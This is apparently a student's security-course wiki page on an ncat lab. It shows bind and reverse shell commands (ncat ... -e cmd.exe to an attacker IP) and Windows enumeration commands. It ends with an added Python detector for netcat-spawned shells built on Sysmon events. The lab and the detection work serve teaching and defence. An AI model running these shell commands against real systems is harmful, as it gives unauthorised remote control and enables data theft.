Week 6 Popping Shells - devinziegler/Devin-Tech-Journal GitHub Wiki
Assignment: Week 6 - Using ncat to obtain a shell, exfiltrate data
In this lab we used ncat to start a listener on the target system. Then the attacking computer can connect to the target computer.
- Command For Target System:
ncat -l 8001 -e cmd.exe -v
-l means listener
-v is verbose mode (shows information on shell setup)
- Command For Attacking System:
ncat <target IP> 8001
8001 is the port that we will be connecting to
The attacker is now logged into the target system and can execute commands. However, this first example only works on a system with no firewall.
In this example the target system has a firewall enabled and does not allow inbound traffic. This takes advantage of the firewall still allowing outbound traffic. The target system will have to open a file that connects back to the attacking system.
- Attacker starts listener:
ncat -l 8080 -vv
- Target System Will Connect To Attacker:
ncat -vv <attacker IP> 8080 -e cmd.exe
The attacker is now logged into the target system and can execute commands. This example evades most firewalls because it takes advantage of outbound traffic.
Examine and test how threat actors obtain a shell on a remote computer.
NOTE: This lab is similar to what you did when you used Metasploit to exploit your Windows XP system.
It is important to understand how attackers are able to obtain a shell on a remote system since it is a common method of maintaining access and stealing data (exfiltration or exfil). Notice that they are able to use any arbitrary port.
- Each person must change the Network Adapter on their Windows 10 Virtual Machine to “NETSEC-WAN”
- You may have to run: ipconfig /release ; ipconfig /renew
- You should have an IP address in the 10.0.16.XXX range
- Download nmap on your Windows 10 Virtual Machine: https://nmap.org/dist/nmap-7.93-setup.exe
Assume two systems can communicate directly with each other on an arbitrary port (i.e., there is no firewall or other device preventing them from communicating directly with each other). Alice is the victim and Eve is the attacker, so one of you will be Alice for the duration of the assignment and the other one Eve. When the first person is done with this lab, switch roles.
- Make a note of each other’s IP address.
- Ensure the two Windows workstations can ping each other and disable the firewall on both hosts.
Goal: On Alice’s computer, a _listener_ (-l) (lower case L) is started on port 8001 and anyone that connects to it will get a command prompt on Alice's computer. The -v is for _verbose_ mode. It is always a good option so you know what is going on as the shell is being set up.
Alice (Type the command): ncat -l 8001 -e cmd.exe -v
Eve Connects to Alice's computer on port 8001.
Eve (Type the command): **ncat X.X.X.X 8001**
Replace X.X.X.X with the IP address of Alice’s computer.
Eve should now see something like this:
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\Program Files\Nmap>
Eve is now logged into Alice's system and can type commands as if she were sitting in front of Alice’s computer.
Run the command:
ipconfig /all
which should display the IP address of your partner's Windows system.
Learn how attackers can bypass firewalls when there is no direct communication from the attacker’s computer to the victim’s computer.
In this scenario the attacker controls their own computer, which is why the attacker disables their firewall: it simulates that the attacker can decide which port to use and open on their system.
This attack is how phishing campaigns work: someone is tricked into opening a document, and the attacker obtains a shell on their computer. The victim is behind a corporate firewall so Eve CANNOT connect directly to Alice. Instead, Alice is tricked into opening a document that connects back to Eve’s computer.
Alice is behind a firewall so Eve can't connect directly to her computer.
- Alice, change your Windows 10 Network Adapter and set it back to your LAN segment.
- Alice, enable your Windows 10 firewall.
- Eve, keep your Windows 10 Network Adapter on the NETSEC-WAN segment.
NOTE: When you switch roles, don’t forget to change your network adapters accordingly.
Eve will start her listener:
Eve (run the command): ncat -l 8080 -vv
Alice connects to Eve and gives her computer’s command prompt to Eve. The **-e** means execute. In this case, when Alice connects to Eve, Alice will execute the command cmd.exe and push the command prompt (aka shell) over to Eve.
Alice: ncat -vv X.X.X.X 8080 -e cmd.exe
Eve should see something like this on her screen:
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\Program Files\Nmap>
You can check by typing:
ipconfig
and it should print the IP address of Alice’s computer.
Type some other commands used to enumerate a remote computer. NOTE: Don’t type the # and test. Type the commands in bold.
net users
net view
net users /DOMAIN
tasklist
tasklist /svc
arp -a
wmic product get name, version, installlocation
wmic process
wmic os
wmic useraccount
systeminfo
All the commands you are running are part of the process of enumeration. If an attacker can run these types of arbitrary commands, they are beginning the process of scoping out your organization.
BE SURE YOU UNDERSTAND HOW THIS WORKS.
This evades most firewalls because most firewalls are configured to allow any outbound traffic. Since Eve controls the computer on her end, she can allow Alice to connect to any port on her computer. Even if Alice is behind a restrictive firewall that allows port 80 outbound, Eve can allow her to connect to her computer on Port 80 using the same commands above, except 8080 will become 80.
This is similar to how malware works. It executes a command and connects back to the attacker's computer. Just as in the command above, the malware can push the victim's shell back to the attacker.
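From the defender's side, both halves of this lab (the bind shell started with ncat -l ... -e cmd.exe and the reverse shell started with ncat <IP> <port> -e cmd.exe) leave the same footprint on the victim: an ncat process with an exec option, a cmd.exe whose parent is that ncat process, and enumeration commands (net, tasklist, wmic, systeminfo, ...) running as children of that cmd.exe. The following is an added detection example written for this journal page; it is not part of the original lab or of Nmap/ncat. It parses ncat command lines to tell bind from reverse shells and then walks Sysmon-style process-create (Event ID 1) and network-connection (Event ID 3) events. The event dicts, their field names, the PIDs, paths and the 10.0.16.20 address are all constructed for the example.

```python
"""Added example (not from the lab page): detect ncat bind/reverse shells and
enumeration commands run under them from Sysmon-style events. Event field
names and all sample values below are constructed for this example."""
import os
from collections import defaultdict

NETCAT_NAMES = {"ncat.exe", "nc.exe", "netcat.exe"}
SHELL_NAMES = {"cmd.exe", "powershell.exe"}
# Commands the lab runs to enumerate the victim once a shell is obtained
ENUM_NAMES = {"net.exe", "tasklist.exe", "arp.exe", "wmic.exe",
              "systeminfo.exe", "ipconfig.exe"}
NCAT_DEFAULT_PORT = 31337  # ncat uses this port when none is given


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return os.path.basename(path.replace("\\", "/")).lower()


def to_int(text):
    try:
        return int(text)
    except (TypeError, ValueError):
        return None


def parse_ncat_cmdline(cmdline):
    """Classify an ncat command line: bind shell (-l plus -e/-c) or reverse
    shell (-e/-c without -l). A plain client or listener gets mode None."""
    args = cmdline.split()[1:]
    listen, exe, port, positional = False, None, None, []
    i = 0
    while i < len(args):
        arg = args[i]
        nxt = args[i + 1] if i + 1 < len(args) else None
        if arg in ("--exec", "--sh-exec"):
            exe, i = nxt, i + 1
        elif arg.startswith("--"):
            pass  # other long options ignored; a value may land in positional
        elif arg.startswith("-") and len(arg) > 1:
            flags = set(arg[1:])  # clustered short flags such as -lvp
            if "l" in flags:
                listen = True
            if "e" in flags or "c" in flags:  # program handed to the peer
                exe, i = nxt, i + 1
            elif "p" in flags:  # explicit local port
                port, i = to_int(nxt), i + 1
        else:
            positional.append(arg)
        i += 1
    if listen:
        host = None
        if port is None and positional:
            port = to_int(positional[0])
    else:
        host = positional[0] if positional else None
        if port is None:
            port = to_int(positional[1]) if len(positional) > 1 else NCAT_DEFAULT_PORT
    mode = None if exe is None else ("bind" if listen else "reverse")
    return {"mode": mode, "listen": listen, "exec": exe, "host": host, "port": port}


def analyze(events):
    """Return findings from Sysmon-style events (id 1 = process create,
    id 3 = network connection)."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    conns = defaultdict(list)
    for e in events:
        if e["id"] == 3:
            conns[e["pid"]].append(f'{e["dst"]}:{e["dst_port"]}')
    findings, shell_pids = [], set()
    for e in procs.values():
        name = basename(e["image"])
        parent = procs.get(e["ppid"])
        parent_name = basename(parent["image"]) if parent else ""
        if name in NETCAT_NAMES:
            info = parse_ncat_cmdline(e["cmdline"])
            if info["mode"]:
                findings.append({"kind": info["mode"] + "_shell", "pid": e["pid"],
                                 "port": info["port"], "exec": info["exec"],
                                 "peers": conns.get(e["pid"], [])})
        elif name in SHELL_NAMES and parent_name in NETCAT_NAMES:
            shell_pids.add(e["pid"])  # shell whose stdio is wired to a socket
            findings.append({"kind": "shell_spawned_by_netcat", "pid": e["pid"],
                             "parent_pid": e["ppid"]})
    for e in procs.values():
        if e["ppid"] in shell_pids and basename(e["image"]) in ENUM_NAMES:
            findings.append({"kind": "enumeration_under_netcat_shell",
                             "pid": e["pid"], "cmdline": e["cmdline"]})
    return findings


NCAT = r"C:\Program Files\Nmap\ncat.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [  # constructed: Alice's host, reverse shell to Eve at 10.0.16.20
    {"id": 1, "pid": 3000, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"id": 1, "pid": 4100, "ppid": 3000, "image": NCAT, "cmdline": "ncat -vv 10.0.16.20 8080 -e cmd.exe"},
    {"id": 3, "pid": 4100, "dst": "10.0.16.20", "dst_port": 8080},
    {"id": 1, "pid": 4101, "ppid": 4100, "image": CMD, "cmdline": "cmd.exe"},
    {"id": 1, "pid": 4102, "ppid": 4101, "image": r"C:\Windows\System32\net.exe", "cmdline": "net users"},
    {"id": 1, "pid": 4103, "ppid": 4101, "image": r"C:\Windows\System32\tasklist.exe", "cmdline": "tasklist /svc"},
    # benign: an interactive cmd.exe under explorer running ipconfig
    {"id": 1, "pid": 5000, "ppid": 3000, "image": CMD, "cmdline": "cmd.exe"},
    {"id": 1, "pid": 5001, "ppid": 5000, "image": r"C:\Windows\System32\ipconfig.exe", "cmdline": "ipconfig /all"},
    # a bind-shell listener, as in the first half of the lab
    {"id": 1, "pid": 6100, "ppid": 3000, "image": NCAT, "cmdline": "ncat -l 8001 -e cmd.exe -v"},
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

Two design points matter in practice. The binary-name check (ncat.exe, nc.exe) is the weakest part of the rule, since a renamed copy defeats it; the parent/child relationship (a shell whose parent holds a network socket) and the enumeration commands running underneath it are the more durable signals, which is why the example records them separately. And the reason the reverse shell in this lab "evades most firewalls" is the permissive outbound policy the page describes, so the matching control on the network side is egress filtering from workstations: if the victim can only reach approved destinations, the ncat <attacker IP> 8080 step never completes regardless of which port the attacker opens.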